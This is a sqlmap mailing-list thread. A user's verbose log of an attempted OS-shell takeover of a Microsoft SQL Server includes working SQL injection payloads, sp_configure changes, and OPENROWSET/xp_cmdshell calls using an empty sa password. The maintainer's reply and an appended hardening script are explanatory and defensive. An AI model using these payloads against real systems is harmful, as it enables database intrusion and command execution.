Hi Daniel,

There's no need to provide the --sql-file, sqlmap will use the file
itself as part of the internal logic when --dbms-cred is provided.
However, OPENROWSET on Microsoft SQL Server 2005+ by default is not
executable by non-DBA users or users that haven't been specifically
granted permission to that built-in function, so it is unlikely that the
unprivileged session user will be able to execute it.
I see what you're trying to do, but vertical privilege escalation to
DBA via OPENROWSET works with default settings on Microsoft SQL Server
2000 and previous versions only.

According to the parsed DBMS error messages, the session user is indeed
not a DBA, hence no command execution.

Bernardo


On 21 March 2014 08:09, Daniel Shapira <donatekikor...@gmail.com> wrote:
> Hey,
> I am trying to write on MSSQL with either os-shell or any other flag (none
> works for me).
> I know that 'Ad Hoc Distributed Queries' are disabled -> OpenRowSet is
> disabled as well.
> sqlmap initially gets into the DB as a secondary user; there are 2 users in
> the DB, SA which is the administrator and the other user which sqlmap gets
> at start.
> The password for sa is NULL - no password at all, I know that by executing
> --users --passwords.
> So with all this data I am trying to run:
>  sqlmap -u "target" --risk=5 --level=5 --random-agent --threads=10 -o
> --os-shell --dbms-cred=sa: --fresh-queries -v3 --parse-errors -t traffic.txt
> --sql-file=/usr/share/sqlmap/procs/mssqlserver/configure_openrowset.sql
> I also tried without the sql-file as I guess sqlmap should try it by itself,
> but I get the same results.
> So my guess is that sqlmap can't get into the 'sa' user because if it could
> get in, it would enable the openrowset. Am I right?
> I can send the traffic.txt privately.
> **********************
>
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: GET
> Parameter: keyword
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: keyword=f') AND 1202=1202 AND ('NhGb' LIKE 'NhGb
>     Vector: AND [INFERENCE]
>
>     Type: error-based
>     Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
> clause
>     Payload: keyword=f') AND 7343=CONVERT(INT,(SELECT
> CHAR(113)+CHAR(115)+CHAR(103)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN
> (7343=7343) THEN CHAR(49) ELSE CHAR(48)
> END))+CHAR(113)+CHAR(121)+CHAR(119)+CHAR(117)+CHAR(113))) AND ('PGJx' LIKE
> 'PGJx
>     Vector: AND [RANDNUM]=CONVERT(INT,(SELECT
> '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
>
>     Type: stacked queries
>     Title: Microsoft SQL Server/Sybase stacked queries
>     Payload: keyword=f'); WAITFOR DELAY '0:0:5'--
>     Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
>
>     Type: AND/OR time-based blind
>     Title: Microsoft SQL Server/Sybase time-based blind
>     Payload: keyword=f') WAITFOR DELAY '0:0:5'--
>     Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
> ---
> [03:57:43] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows 2008 R2 or 7
> web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
> back-end DBMS: Microsoft SQL Server 2008
> [03:57:43] [INFO] executing SQL statements from given file(s)
> [03:57:43] [ERROR] unresolved variable 'ENABLE' in SQL file
> '/usr/share/sqlmap/procs/mssqlserver/configure_openrowset.sql'
> do you want to provide the substitution values? [y/N] y
> insert value for variable 'ENABLE': 1
> [03:57:46] [DEBUG] executing SQL data execution query: 'EXEC
> master..sp_configure 'show advanced options', 1; RECONFIGURE WITH OVERRIDE;
> EXEC master..sp_configure 'Ad Hoc Distributed Queries', 1; RECONFIGURE WITH
> OVERRIDE; EXEC sp_configure 'show advanced options', 0; RECONFIGURE WITH
> OVERRIDE'
> [03:57:46] [PAYLOAD] f');EXEC master..sp_configure 'SHOW advanced options',
> 1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'Ad Hoc Distributed
> Queries', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'SHOW advanced
> options', 0; RECONFIGURE WITH OVERRIDE--
> [03:57:46] [WARNING] time-based comparison requires larger statistical
> model, please wait..............................
> [03:57:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:57:53] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [03:57:53] [DEBUG] done
> EXEC master..sp_configure 'show advanced options', 1; RECONFIGURE WITH
> OVERRIDE; EXEC master..sp_configure 'Ad Hoc Distributed Queries', 1;
> RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'show advanced options', 0;
> RECONFIGURE WITH OVERRIDE:    'NULL'
> [03:57:53] [DEBUG] going to use D:/Microsoft SQL
> Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log as temporary files directory
> on Microsoft SQL Server 2005 and 2008, OPENROWSET function is disabled by
> default. This function is needed to execute statements as another DBMS user
> since you provided the option '--dbms-creds'. If you are DBA, you can enable
> it. Do you want to enable it? [Y/n] Y
> [03:59:06] [PAYLOAD] f');EXEC master..sp_configure 'SHOW advanced options',
> 1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'Ad Hoc Distributed
> Queries', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'SHOW advanced
> options', 0; RECONFIGURE WITH OVERRIDE--
> [03:59:06] [WARNING] it is very important not to stress the network adapter
> during usage of time-based payloads to prevent potential errors
> [03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:06] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [03:59:06] [INFO] testing if current user is DBA
> [03:59:06] [PAYLOAD] f') AND 7808=CONVERT(INT,(SELECT
> CHAR(113)+CHAR(115)+CHAR(103)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN
> (IS_SRVROLEMEMBER(CHAR(115)+CHAR(121)+CHAR(115)+CHAR(97)+CHAR(100)+CHAR(109)+CHAR(105)+CHAR(110))=1)
> THEN CHAR(49) ELSE CHAR(48)
> END))+CHAR(113)+CHAR(121)+CHAR(119)+CHAR(117)+CHAR(113))) AND ('FSjT' LIKE
> 'FSjT
> [03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:06] [WARNING] parsed DBMS error message:
> 'System.Data.SqlClient.SqlException: Conversion failed when converting the
> varchar value 'qsgjq0qywuq' to data type int.'
> [03:59:06] [DEBUG] performed 1 queries in 0.13 seconds
> [03:59:06] [WARNING] functionality requested probably does not work because
> the curent session user is not a database administrator
> [03:59:06] [DEBUG] creating a support table to write commands standard
> output to
> [03:59:06] [PAYLOAD] f');DROP TABLE sqlmapoutput--
> [03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:06] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [03:59:06] [PAYLOAD] f');CREATE TABLE sqlmapoutput(id INT PRIMARY KEY
> IDENTITY, data NVARCHAR(4000))--
> [03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:06] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [03:59:06] [INFO] testing if xp_cmdshell extended procedure is usable
> [03:59:06] [PAYLOAD] f');SELECT * FROM
> OPENROWSET('SQLOLEDB','';'sa';'NULL','SET FMTONLY OFF DECLARE @ktdg
> VARCHAR(8000);SET
> @ktdg=0x6563686f2031203e2022443a2f4d6963726f736f66742053514c205365727665722f4d5353514c31305f35302e4d5353514c5345525645522f4d5353514c2f4c6f672f746d70636f6974652e74787422;EXEC
> master..xp_cmdshell @ktdg')--
> [03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:06] [WARNING] parsed DBMS error message:
> 'System.Data.SqlClient.SqlException: SQL Server blocked access to STATEMENT
> 'OpenRowset/OpenDatasource' of component 'Ad Hoc Distributed Queries'
> because this component is turned off as part of the security configuration
> for this server. A system administrator can enable the use of 'Ad Hoc
> Distributed Queries' by using sp_configure. For more information about
> enabling 'Ad Hoc Distributed Queries', see "Surface Area Configuration" in
> SQL Server Books Online.'
> [03:59:06] [PAYLOAD] f');BULK INSERT sqlmapoutput FROM 'D:/Microsoft SQL
> Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log/tmpcoite.txt' WITH (CODEPAGE='RAW',
> FIELDTERMINATOR='WaPrHIHUBH', ROWTERMINATOR='vOTmRkjwAa')--
> [03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:06] [WARNING] parsed DBMS error message:
> 'System.Data.SqlClient.SqlException: You do not have permission to use the
> bulk load statement.'
> [03:59:06] [PAYLOAD] f');SELECT * FROM
> OPENROWSET('SQLOLEDB','';'sa';'NULL','SET FMTONLY OFF DECLARE @wgiw
> VARCHAR(8000);SET
> @wgiw=0x64656c202f46202f5120443a5c4d6963726f736f66742053514c205365727665725c4d5353514c31305f35302e4d5353514c5345525645525c4d5353514c5c4c6f675c746d70636f6974652e747874;EXEC
> master..xp_cmdshell @wgiw')--
> [03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:07] [WARNING] parsed DBMS error message:
> 'System.Data.SqlClient.SqlException: SQL Server blocked access to STATEMENT
> 'OpenRowset/OpenDatasource' of component 'Ad Hoc Distributed Queries'
> because this component is turned off as part of the security configuration
> for this server. A system administrator can enable the use of 'Ad Hoc
> Distributed Queries' by using sp_configure. For more information about
> enabling 'Ad Hoc Distributed Queries', see "Surface Area Configuration" in
> SQL Server Books Online.'
> [03:59:07] [PAYLOAD] f') AND 9097=CONVERT(INT,(SELECT
> CHAR(113)+CHAR(115)+CHAR(103)+CHAR(106)+CHAR(113)+(SELECT
> ISNULL(CAST(COUNT(data) AS NVARCHAR(4000)),CHAR(32)) FROM
> sqlmapoutput)+CHAR(113)+CHAR(121)+CHAR(119)+CHAR(117)+CHAR(113))) AND
> ('tzMl' LIKE 'tzMl
> [03:59:07] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:07] [WARNING] parsed DBMS error message:
> 'System.Data.SqlClient.SqlException: Conversion failed when converting the
> nvarchar value 'qsgjq0qywuq' to data type int.'
> [03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>51 AND ('EirG' LIKE
> 'EirG
> [03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>54 AND ('EirG' LIKE
> 'EirG
> [03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>56 AND ('EirG' LIKE
> 'EirG
> [03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>57 AND ('EirG' LIKE
> 'EirG
> [03:59:07] [INFO] retrieved:
> [03:59:07] [DEBUG] performed 4 queries in 0.38 seconds
> [03:59:07] [WARNING] multi-threading is considered unsafe in time-based data
> retrieval. Going to switch it off automatically
> [03:59:07] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>51) WAITFOR DELAY
> '0:0:5'--
> [03:59:07] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:07] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [03:59:07] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>48) WAITFOR DELAY
> '0:0:5'--
> [03:59:08] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:08] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [03:59:08] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>1) WAITFOR DELAY
> '0:0:5'--
> [03:59:13] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [03:59:13] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> do you want sqlmap to try to optimize value(s) for DBMS delay responses
> (option '--time-sec')? [Y/n] y
> [04:00:34] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>47) WAITFOR DELAY
> '0:0:5'--
> [04:00:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [04:00:39] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [04:00:39] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))!=48) WAITFOR DELAY
> '0:0:5'--
> [04:00:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [04:00:39] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [04:00:39] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),2,1))>51) WAITFOR DELAY
> '0:0:5'--
> [04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [04:00:40] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [04:00:40] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),2,1))>48) WAITFOR DELAY
> '0:0:5'--
> [04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [04:00:40] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [04:00:40] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
> AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),2,1))>1) WAITFOR DELAY
> '0:0:5'--
> [04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [04:00:40] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [04:00:40] [INFO] retrieved: 0
> [04:00:40] [DEBUG] performed 8 queries in 92.65 seconds
> [04:00:40] [PAYLOAD] f');DELETE FROM sqlmapoutput--
> [04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [04:00:40] [WARNING] parsed DBMS error message:
> 'System.NullReferenceException: Object reference not set to an instance of
> an object.'
> [04:00:40] [ERROR] it seems that the temporary directory ('D:/Microsoft SQL
> Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log') used for storing console output
> within the back-end file system does not have writing permissions for the
> DBMS process. You are advised to manually adjust it with option --tmp-path
> switch or you will not be able to retrieve the commands output
> [04:00:40] [INFO] going to use xp_cmdshell extended procedure for operating
> system command execution
> [04:00:40] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and
> press ENTER
> os-shell> x
>
>
> ------------------------------------------------------------------------------
> Learn Graph Databases - Download FREE O'Reilly Book
> "Graph Databases" is the definitive new guide to graph databases and their
> applications. Written by three acclaimed leaders in the field,
> this first edition is now available. Download your free book today!
> http://p.sf.net/sfu/13534_NeoTech
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
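The thread turns on three server-side conditions: whether the session login is a sysadmin, whether 'Ad Hoc Distributed Queries' (and with it OPENROWSET/OPENDATASOURCE) is enabled, and whether the sa login has an empty password. The following T-SQL is an added audit script for a DBA reviewing an instance after seeing this kind of traffic; it is not part of the thread and not sqlmap's own code. It assumes it is run by a login with sysadmin rights (needed to read password hashes from sys.sql_logins and to change server options) on SQL Server 2005 or later, where sys.configurations and PWDCOMPARE exist.

```sql
-- Added example (not from the thread): audit and harden the settings that
-- the quoted sqlmap session probes on Microsoft SQL Server 2005+.
-- Assumes a sysadmin login; results are returned as result sets.
SET NOCOUNT ON;

-- 1. Who am I, and am I a sysadmin? This is the same IS_SRVROLEMEMBER check
--    that sqlmap runs when "testing if current user is DBA".
SELECT SUSER_SNAME() AS login_name,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- 2. Server options that the quoted payloads try to flip with sp_configure.
--    'Ad Hoc Distributed Queries' gates OPENROWSET/OPENDATASOURCE,
--    'xp_cmdshell' gates OS command execution. Both are 0 by default on 2005+.
SELECT name, value AS configured_value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'Ad Hoc Distributed Queries', 'xp_cmdshell');

-- 3. SQL logins with an empty password (PWDCOMPARE returns 1 on a match).
--    In the thread the sa password was NULL, which would also match here.
SELECT name, is_disabled
FROM sys.sql_logins
WHERE PWDCOMPARE('', password_hash) = 1;

-- 4. Leftover support table: the quoted session issues
--    CREATE TABLE sqlmapoutput(...), so its presence in any database is a
--    useful post-incident indicator. Checked here in the current database.
SELECT SCHEMA_NAME(schema_id) AS schema_name, name AS table_name, create_date
FROM sys.tables
WHERE name = 'sqlmapoutput';

-- 5. Hardening: restore the 2005+ defaults the thread describes and make sure
--    sa cannot be used with an empty password.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries', 0;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
-- Disabling sa outright is the usual recommendation; if it must stay enabled,
-- set a strong password with ALTER LOGIN sa WITH PASSWORD = '...' instead.
ALTER LOGIN sa DISABLE;
```

Sections 1 to 4 are read-only and can be run on their own during triage; section 5 changes server configuration, so run it deliberately and note that RECONFIGURE after each sp_configure call is what makes the value take effect (the quoted payloads use RECONFIGURE WITH OVERRIDE for the same reason).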
